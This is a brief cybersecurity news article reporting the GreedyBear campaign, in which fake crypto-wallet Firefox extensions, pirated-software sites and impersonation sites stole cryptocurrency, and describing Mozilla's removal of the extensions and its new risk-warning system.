Redazione RHC : 10 August 2025 10:19
Koi Security analysts have discovered the GreedyBear malware campaign active in the Mozilla add-on store. 150 malicious Firefox extensions stole over $1 million worth of cryptocurrency from users. The fraudulent add-ons were posing as extensions for popular cryptocurrency wallets from well-known platforms, including MetaMask, TronLink, Exodus, and Rabby Wallet. Initially, they were uploaded to the store without malicious code to pass the checks and left dormant for a while, accumulating fake positive reviews.
The extension has not yet become malicious.
In a later stage of the attack, the extension’s publishers removed the original branding and replaced it with new names and logos, and also embedded malware into the code designed to steal users’ wallet data and IP addresses (likely for tracking or targeting purposes).The malicious code acted as a keylogger,intercepting data entered into form fields and pop-up windows and sending it to the attackers’ server.
Koi Security specialists informed Mozilla developers of their findings, and the malicious extensions were removed from the Firefox add-ons store. However, in addition to Firefox extensions, the operation also involves dozens of pirated software sites helping distribute 500 different malware executables, as well as a network of sites impersonating official Trezor and Jupiter Wallet resources and fake hardware wallet repair services, researchers report.
Fake Jupiter Wallet Website
All of these sites are connected to a single IP address (185.208.156[.]66), which serves as the control server for GreedyBear. In these cases, various Trojans, infostealers (such as Lumma), or even ransomware can be used as malicious payloads. The report also states that analysis of the campaign revealed clear artifacts indicating that the attackers were using artificial intelligence.
“This allows attackers to scale their operations, diversify payloads, and evade detection more quickly and easily than ever before,” the experts write. The company also warned that GreedyBear’s operators are clearly considering distributing the malware via the Chrome Web Store as well. Researchers found a malicious Chrome extension called Filecoin Wallet that used the same data-stealing logic and was linked to the aforementioned IP address.
It’s important to note that in June 2025, Mozilla developers introduced a new system for the early detection of add-ons related to cryptocurrency fraud. The system creates risk profiles for each wallet extension in the store and automatically warns of risks when a specified threshold is reached.
These warnings should encourage people reviewing add-ons to more closely examine specific extensions to remove malware from the store before it is used to empty users’ wallets.
Redazione